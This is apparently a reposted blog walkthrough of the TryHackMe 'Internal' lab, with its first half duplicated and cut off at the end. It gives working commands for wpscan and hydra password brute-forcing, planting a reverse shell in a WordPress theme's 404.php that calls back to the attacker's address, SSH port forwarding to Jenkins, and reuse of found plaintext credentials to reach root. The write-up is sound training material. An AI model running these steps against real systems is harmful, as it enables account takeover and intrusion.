02-18-2023, 11:53 AM
TryHackMe – How I Used WPScan to Extract Login Credentials (WordPress)
<div>
<div class="kk-star-ratings kksr-auto kksr-align-left kksr-valign-top" data-payload='{"align":"left","id":"1141940","slug":"default","valign":"top","ignore":"","reference":"auto","class":"","count":"1","legendonly":"","readonly":"","score":"5","starsonly":"","best":"5","gap":"5","greet":"Rate this post","legend":"5\/5 - (1 vote)","size":"24","width":"142.5","_legend":"{score}\/{best} - ({count} {votes})","font_factor":"1.25"}'>
<div class="kksr-stars">
<div class="kksr-stars-inactive">
<div class="kksr-star" data-star="1" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="2" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="3" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="4" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="5" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
<div class="kksr-stars-active" style="width: 142.5px;">
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
</div>
<div class="kksr-legend" style="font-size: 19.2px;"> 5/5 – (1 vote) </div>
</p></div>
<h2>CHALLENGE OVERVIEW</h2>
<figure class="wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube"><a href="https://blog.finxter.com/tryhackme-how-i-used-wpscan-to-extract-login-credentials-wordpress/"><img src="https://blog.finxter.com/wp-content/plugins/wp-youtube-lyte/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2FXF3NcIh8C9w%2Fhqdefault.jpg" alt="YouTube Video"></a><figcaption></figcaption></figure>
<ul>
<li><strong>CTF Creator: </strong><a rel="noreferrer noopener" href="https://tryhackme.com/p/TheMayor" target="_blank"><strong>TheMayor</strong></a></li>
<li><strong>Link</strong>: <a href="https://tryhackme.com/room/internal" target="_blank" rel="noreferrer noopener">https://tryhackme.com/room/internal</a></li>
<li><strong>Difficulty</strong>: Hard</li>
<li><strong>Target</strong>: Root/User flags</li>
<li><strong>Highlight</strong>: Enumerating a wordpress site with wpscan</li>
<li><strong>Tools used</strong>: <code>pentest.ws</code>, <code>hydra</code>, <code>nmap</code>, <code>dirb</code>, <code>linpeas</code>, <code>ssh</code> with <a href="https://blog.finxter.com/tryhackme-badbyte-walkthrough-how-i-used-port-forwarding-to-hack-into-an-internal-sites-server/" data-type="post" data-id="1041685" target="_blank" rel="noreferrer noopener">port forwarding</a></li>
<li><strong>Tags</strong>: <em>CTF, security, accessible, pentest, blackbox</em></li>
</ul>
<h2>BACKGROUND</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="624" height="941" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-249.png" alt="" class="wp-image-1142194" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-249.png 624w, https://blog.finxter.com/wp-content/uplo...99x300.png 199w" sizes="(max-width: 624px) 100vw, 624px" /></figure>
</div>
<p>This CTF challenge is another blackbox-style pentest where we don’t know anything about our target other than the IP address. </p>
<p>We will have to discover ports and services running on the server with our standard pentesting tools like <code>nmap</code> and <code>dirb</code> scan. We also don’t have any inside information about the backend of the target machine. </p>
<p>Let’s get started!</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="840" height="474" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-237.png" alt="" class="wp-image-1141967" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-237.png 840w, https://blog.finxter.com/wp-content/uplo...00x169.png 300w, https://blog.finxter.com/wp-content/uplo...68x433.png 768w" sizes="(max-width: 840px) 100vw, 840px" /></figure>
</div>
<p>We’ll be testing out the website <code>pentest.ws</code> during today’s video walkthrough. </p>
<p>It is a site designed for pentesters to keep track of their enumeration and credentials. The paid version also helps pentesters create professional VAPT reports (vulnerability assessment and penetration testing reports). </p>
<p>At the end of this post, I will summarize my thoughts on using <code>pentest.ws</code> for the first time.</p>
<h2>ENUMERATION/RECON</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="735" height="481" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-250.png" alt="" class="wp-image-1142210" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-250.png 735w, https://blog.finxter.com/wp-content/uplo...00x196.png 300w" sizes="(max-width: 735px) 100vw, 735px" /></figure>
</div>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sudo nmap -A -oX nmap.txt $targetIP -p-</pre>
<p>Today we are exporting our <code>nmap</code> results in <a href="https://blog.finxter.com/parsing-xml-files-in-python-a-simple-guide/" data-type="post" data-id="883225" target="_blank" rel="noreferrer noopener">XML</a> format so that we can upload them to <code>pentest.ws</code> and have the site automatically parse our findings.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">dirb http://$targetIP -o dirb.txt</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="517" height="192" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-238.png" alt="" class="wp-image-1141980" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-238.png 517w, https://blog.finxter.com/wp-content/uplo...00x111.png 300w" sizes="(max-width: 517px) 100vw, 517px" /></figure>
</div>
<p>We discovered a WordPress login at: <a href="http://internal.thm/blog/wp-login.php" target="_blank" rel="noreferrer noopener">http://internal.thm/blog/wp-login.php</a></p>
<h2>USING WPSCAN TO EXTRACT WORDPRESS LOGIN CREDENTIALS</h2>
<p>Let’s use <code>wpscan</code> to discover the admin’s email and password for WordPress.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">wpscan --url 10.10.61.252/blog -e vpn,u -o wpscan.txt</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="826" height="330" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-239.png" alt="" class="wp-image-1141988" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-239.png 826w, https://blog.finxter.com/wp-content/uplo...00x120.png 300w, https://blog.finxter.com/wp-content/uplo...68x307.png 768w" sizes="(max-width: 826px) 100vw, 826px" /></figure>
</div>
<p>Now that we found a username, we can run <code>wpscan</code> again with a wordlist to brute-force the password.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">wpscan --url 10.10.61.262/blog --usernames admin --passwords /home/kalisurfer/hacking-tools/rockyou.txt --max-threads 50 -o wpscan-passwds.txt</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="727" height="640" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-240.png" alt="" class="wp-image-1141991" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-240.png 727w, https://blog.finxter.com/wp-content/uplo...00x264.png 300w" sizes="(max-width: 727px) 100vw, 727px" /></figure>
</div>
<p>We found the admin email and password!</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">admin:my2boys</pre>
<p>Now we can log into WordPress and look for a place to upload a <a href="https://blog.finxter.com/ezpzshell-a-cool-all-in-one-python-script-that-simplifies-revshell-creation/" data-type="post" data-id="1118920" target="_blank" rel="noreferrer noopener">revshell</a>.</p>
<h2>INITIAL FOOTHOLD – SPAWN A REVSHELL BY EDITING 404.PHP</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="647" height="528" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-241.png" alt="" class="wp-image-1141996" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-241.png 647w, https://blog.finxter.com/wp-content/uplo...00x245.png 300w" sizes="(max-width: 647px) 100vw, 647px" /></figure>
</div>
<p>We’ll edit the template for <code>404.php</code> and drop in a revshell created quickly and easily with EzpzShell.py. </p>
<p>If you want to learn more about <strong><code>ezpzshell</code></strong>, check out my previous blog post:</p>
<p class="has-base-background-color has-background"><img src="https://s.w.org/images/core/emoji/14.0.0/72x72/1f449.png" alt="?" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <strong>Learn More</strong>: <a href="https://blog.finxter.com/ezpzshell-a-cool-all-in-one-python-script-that-simplifies-revshell-creation/" data-type="URL" data-id="https://blog.finxter.com/ezpzshell-a-cool-all-in-one-python-script-that-simplifies-revshell-creation/" target="_blank" rel="noreferrer noopener">EzpzShell: An Easy-Peasy Python Script That Simplifies Revshell Creation</a></p>
<p><code>ezpz 10.6.2.23 8888 php</code> (<code>ezpzshell</code> also automatically starts a listener)</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="404" height="238" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-242.png" alt="" class="wp-image-1142014" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-242.png 404w, https://blog.finxter.com/wp-content/uplo...00x177.png 300w" sizes="(max-width: 404px) 100vw, 404px" /></figure>
</div>
<p>After copying the payload to <code>404.php</code>, we make sure it is saved and then trigger the payload:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">http://internal.thm/wordpress/wp-content/themes/twentyseventeen/404.php</pre>
<p>And if everything is set up correctly, we will catch the revshell with <code>ezpz</code> as user: <code>www-data</code>.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="407" height="177" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-243.png" alt="" class="wp-image-1142019" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-243.png 407w, https://blog.finxter.com/wp-content/uplo...00x130.png 300w" sizes="(max-width: 407px) 100vw, 407px" /></figure>
</div>
<h2>STABILIZE THE SHELL</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="738" height="488" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-251.png" alt="" class="wp-image-1142219" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-251.png 738w, https://blog.finxter.com/wp-content/uplo...00x198.png 300w" sizes="(max-width: 738px) 100vw, 738px" /></figure>
</div>
<p>The following command will stabilize the shell:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">python3 -c 'import pty;pty.spawn("/bin/bash")'</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="411" height="177" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-247.png" alt="" class="wp-image-1142078" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-247.png 411w, https://blog.finxter.com/wp-content/uplo...00x129.png 300w" sizes="(max-width: 411px) 100vw, 411px" /></figure>
</div>
<h2>INTERNAL ENUMERATION – FIND USER CREDS</h2>
<p>We discover a txt file with credentials:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">cat wp-save.txt Bill,
Aubreanna needed these credentials for something later. Let her know you have them and where they are.
aubreanna:bubb13guM!@#123
</pre>
<p>Let’s try switching users to <code>aubreanna</code> with the password given in <code>wp-save.txt</code>.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">su aubreanna</pre>
<p>We are in as user <code>aubreanna</code> and immediately find the user flag.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">aubreanna@internal:~$ cat us cat user.txt THM{i—------omitted--------1}
</pre>
<h2>MORE ENUMERATION – DISCOVER A JENKINS SERVICE</h2>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">cat jenkins.txt Internal Jenkins service is running on 172.17.0.2:8080
</pre>
<h2>SET UP PORT FORWARDING VIA SSH LOGIN</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="735" height="480" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-252.png" alt="" class="wp-image-1142227" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-252.png 735w, https://blog.finxter.com/wp-content/uplo...00x196.png 300w" sizes="(max-width: 735px) 100vw, 735px" /></figure>
</div>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">ssh -L 8080:172.17.0.2:8080 [email protected]</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="570" height="631" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-246.png" alt="" class="wp-image-1142074" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-246.png 570w, https://blog.finxter.com/wp-content/uplo...71x300.png 271w" sizes="(max-width: 570px) 100vw, 570px" /></figure>
</div>
<p>SUCCESS! WE’VE CONNECTED UP TO JENKINS VIA SSH PORT FORWARDING! We can now open the <a href="https://blog.finxter.com/tryhackme-alfred-how-i-solved-the-challenge/" data-type="post" data-id="1000191" target="_blank" rel="noreferrer noopener">Jenkins</a> login page in our browser.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="781" height="672" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-245.png" alt="" class="wp-image-1142071" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-245.png 781w, https://blog.finxter.com/wp-content/uplo...00x258.png 300w, https://blog.finxter.com/wp-content/uplo...68x661.png 768w" sizes="(max-width: 781px) 100vw, 781px" /></figure>
</div>
<h2>BRUTE-FORCE THE LOGIN</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="741" height="487" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-253.png" alt="" class="wp-image-1142235" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-253.png 741w, https://blog.finxter.com/wp-content/uplo...00x197.png 300w" sizes="(max-width: 741px) 100vw, 741px" /></figure>
</div>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">hydra -l admin -P /home/kalisurfer/hacking-tools/SecLists/Passwords/Leaked-Databases/rockyou-75.txt -s 8080 127.0.0.1 http-post-form '/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in&login=:Invalid username or password'</pre>
<p>The payload on this command has three parts:</p>
<ol>
<li><code>http-post-form</code> + <code>header</code></li>
<li>the request, edited with admin as the username and <code>^PASS^</code> in place of the password to mark it as the variable for the password wordlist</li>
<li>the error message that the website will return with a wrong password </li>
</ol>
<p><strong>Output:</strong></p>
<pre class="wp-block-preformatted"><code>Using burpsuite or developer mode on firefox will allow us to extract these strings and modify it to our final hydra payload.
Hydra v9.1 © 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
\
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-06 08:57:08
[DATA] max 16 tasks per 1 server, overall 16 tasks, 59185 login tries (l:1/p:59185), ~3700 tries per task
[DATA] attacking http-post-form://127.0.0.1:8080/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in&login=:Invalid username or password
[STATUS] 396.00 tries/min, 396 tries in 00:01h, 58789 to do in 02:29h, 16 active
[8080][http-post-form] host: 127.0.0.1 login: admin password: spongebob
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-06 08:58:10</code>
</pre>
</p>
<p>Credentials found! <code>admin
pongebob</code></p>
<h2>ENUMERATING JENKINS AS ADMIN</h2>
<p>We’ll use the script console on Jenkins to spawn another revshell using <em>groovy scripting language</em>. </p>
<p>We’ll use <code>ezpzshell</code> and choose the Java code, because <em>groovy </em>is built on Java. This time when we catch it, we will be user <code>jenkins</code>. </p>
<p>Manually enumerating through the file system we stumble across a <code>note.txt</code>. Let’s check out the contents:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">cat note.txt</pre>
<p>Output:</p>
<pre class="wp-block-preformatted"><code>Aubreanna, Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here. Use them if you need access to the root user account. root:tr0ub13guM!@#123
</code></pre>
<p>Bingo! We found root user credentials! </p>
<h2>SWITCH USERS TO ROOT</h2>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">su root
root@internal:~# cat root.txt
THM{d—-omitted—3r}
</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="403" height="208" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-244.png" alt="" class="wp-image-1142068" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-244.png 403w, https://blog.finxter.com/wp-content/uplo...00x155.png 300w" sizes="(max-width: 403px) 100vw, 403px" /></figure>
</div>
<h2>FINAL THOUGHTS</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="707" height="943" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-254.png" alt="" class="wp-image-1142241" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-254.png 707w, https://blog.finxter.com/wp-content/uplo...25x300.png 225w" sizes="(max-width: 707px) 100vw, 707px" /></figure>
</div>
<p>I’m not convinced yet that <code>pentest.ws</code> will save me much time on my note taking. Maybe with time and experience it would help. </p>
<p>I think the report features that are available for paying subscribers might be just helpful enough to keep me using their platform. </p>
<p>However, I have concerns about security of their platform, as findings from pentesting can be sensitive and generally include login credentials and other passwords. </p>
<p>Overall, I enjoyed the challenge of this box, especially the part where we set up port forwarding via SSH login to expose the Jenkins login portal to our attack machine.</p>
<p class="has-base-background-color has-background"><img src="https://s.w.org/images/core/emoji/14.0.0/72x72/1f449.png" alt="?" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <strong>Recommended</strong>: <a href="https://blog.finxter.com/ezpzshell-a-cool-all-in-one-python-script-that-simplifies-revshell-creation/" data-type="URL" data-id="https://blog.finxter.com/ezpzshell-a-cool-all-in-one-python-script-that-simplifies-revshell-creation/" target="_blank" rel="noreferrer noopener">EzpzShell: An Easy-Peasy Python Script That Simplifies Revshell Creation</a></p>
</div>
https://www.sickgaming.net/blog/2023/02/...wordpress/
<div>
<div class="kk-star-ratings kksr-auto kksr-align-left kksr-valign-top" data-payload='{"align":"left","id":"1141940","slug":"default","valign":"top","ignore":"","reference":"auto","class":"","count":"1","legendonly":"","readonly":"","score":"5","starsonly":"","best":"5","gap":"5","greet":"Rate this post","legend":"5\/5 - (1 vote)","size":"24","width":"142.5","_legend":"{score}\/{best} - ({count} {votes})","font_factor":"1.25"}'>
<div class="kksr-stars">
<div class="kksr-stars-inactive">
<div class="kksr-star" data-star="1" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="2" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="3" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="4" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="5" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
<div class="kksr-stars-active" style="width: 142.5px;">
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
</div>
<div class="kksr-legend" style="font-size: 19.2px;"> 5/5 – (1 vote) </div>
</p></div>
<h2>CHALLENGE OVERVIEW</h2>
<figure class="wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube"><a href="https://blog.finxter.com/tryhackme-how-i-used-wpscan-to-extract-login-credentials-wordpress/"><img src="https://blog.finxter.com/wp-content/plugins/wp-youtube-lyte/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2FXF3NcIh8C9w%2Fhqdefault.jpg" alt="YouTube Video"></a><figcaption></figcaption></figure>
<ul>
<li><strong>CTF Creator: </strong><a rel="noreferrer noopener" href="https://tryhackme.com/p/TheMayor" target="_blank"><strong>TheMayor</strong></a></li>
<li><strong>Link</strong>: <a href="https://tryhackme.com/room/internal" target="_blank" rel="noreferrer noopener">https://tryhackme.com/room/internal</a></li>
<li><strong>Difficulty</strong>: Hard</li>
<li><strong>Target</strong>: Root/User flags</li>
<li><strong>Highlight</strong>: Enumerating a wordpress site with wpscan</li>
<li><strong>Tools used</strong>: <code>pentest.ws</code>, <code>hydra</code>, <code>nmap</code>, <code>dirb</code>, <code>linpeas</code>, <code>ssh</code> with <a href="https://blog.finxter.com/tryhackme-badbyte-walkthrough-how-i-used-port-forwarding-to-hack-into-an-internal-sites-server/" data-type="post" data-id="1041685" target="_blank" rel="noreferrer noopener">port forwarding</a></li>
<li><strong>Tags</strong>: <em>CTF, security, accessible, pentest, blackbox</em></li>
</ul>
<h2>BACKGROUND</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="624" height="941" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-249.png" alt="" class="wp-image-1142194" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-249.png 624w, https://blog.finxter.com/wp-content/uplo...99x300.png 199w" sizes="(max-width: 624px) 100vw, 624px" /></figure>
</div>
<p>This CTF challenge is another blackbox-style pentest where we don’t know anything about our target other than the IP address. </p>
<p>We will have to discover ports and services running on the server with our standard pentesting tools like <code>nmap</code> and <code>dirb</code> scan. We also don’t have any inside information about the backend of the target machine. </p>
<p>Let’s get started!</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="840" height="474" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-237.png" alt="" class="wp-image-1141967" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-237.png 840w, https://blog.finxter.com/wp-content/uplo...00x169.png 300w, https://blog.finxter.com/wp-content/uplo...68x433.png 768w" sizes="(max-width: 840px) 100vw, 840px" /></figure>
</div>
<p>We’ll be testing out the website <code>pentest.ws</code> during today’s video walkthrough. </p>
<p>It is a site designed for pentesters to keep track of their enumeration and credentials. The paid version also helps pentesters create professional VAPT reports (vulnerability assessment and penetration testing reports). </p>
<p>At the end of this post, I will summarize my thoughts on using <code>pentest.ws</code> for the first time.</p>
<h2>ENUMERATION/RECON</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="735" height="481" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-250.png" alt="" class="wp-image-1142210" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-250.png 735w, https://blog.finxter.com/wp-content/uplo...00x196.png 300w" sizes="(max-width: 735px) 100vw, 735px" /></figure>
</div>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sudo nmap -A -oX nmap.txt $targetIP -p-</pre>
<p>Today we are exporting our <code>nmap</code> results in <a href="https://blog.finxter.com/parsing-xml-files-in-python-a-simple-guide/" data-type="post" data-id="883225" target="_blank" rel="noreferrer noopener">XML</a> format so that we can upload them to <code>pentest.ws</code> and have the site automatically parse our findings.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">dirb http://$targetIP -o dirb.txt</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="517" height="192" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-238.png" alt="" class="wp-image-1141980" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-238.png 517w, https://blog.finxter.com/wp-content/uplo...00x111.png 300w" sizes="(max-width: 517px) 100vw, 517px" /></figure>
</div>
<p>We discovered a WordPress login at: <a href="http://internal.thm/blog/wp-login.php" target="_blank" rel="noreferrer noopener">http://internal.thm/blog/wp-login.php</a></p>
<h2>USING WPSCAN TO EXTRACT WORDPRESS LOGIN CREDENTIALS</h2>
<p>Let’s use <code>wpscan</code> to discover the admin’s email and password for WordPress.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">wpscan --url 10.10.61.252/blog -e vpn,u -o wpscan.txt</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="826" height="330" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-239.png" alt="" class="wp-image-1141988" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-239.png 826w, https://blog.finxter.com/wp-content/uplo...00x120.png 300w, https://blog.finxter.com/wp-content/uplo...68x307.png 768w" sizes="(max-width: 826px) 100vw, 826px" /></figure>
</div>
<p>Now that we found a username, we can run <code>wpscan</code> again with a wordlist to brute-force the password.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">wpscan --url 10.10.61.262/blog --usernames admin --passwords /home/kalisurfer/hacking-tools/rockyou.txt --max-threads 50 -o wpscan-passwds.txt</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="727" height="640" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-240.png" alt="" class="wp-image-1141991" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-240.png 727w, https://blog.finxter.com/wp-content/uplo...00x264.png 300w" sizes="(max-width: 727px) 100vw, 727px" /></figure>
</div>
<p>We found the admin email and password!</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">admin:my2boys</pre>
<p>Now we can log into WordPress and look for a place to upload a <a href="https://blog.finxter.com/ezpzshell-a-cool-all-in-one-python-script-that-simplifies-revshell-creation/" data-type="post" data-id="1118920" target="_blank" rel="noreferrer noopener">revshell</a>.</p>
<h2>INITIAL FOOTHOLD – SPAWN A REVSHELL BY EDITING 404.PHP</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="647" height="528" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-241.png" alt="" class="wp-image-1141996" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-241.png 647w, https://blog.finxter.com/wp-content/uplo...00x245.png 300w" sizes="(max-width: 647px) 100vw, 647px" /></figure>
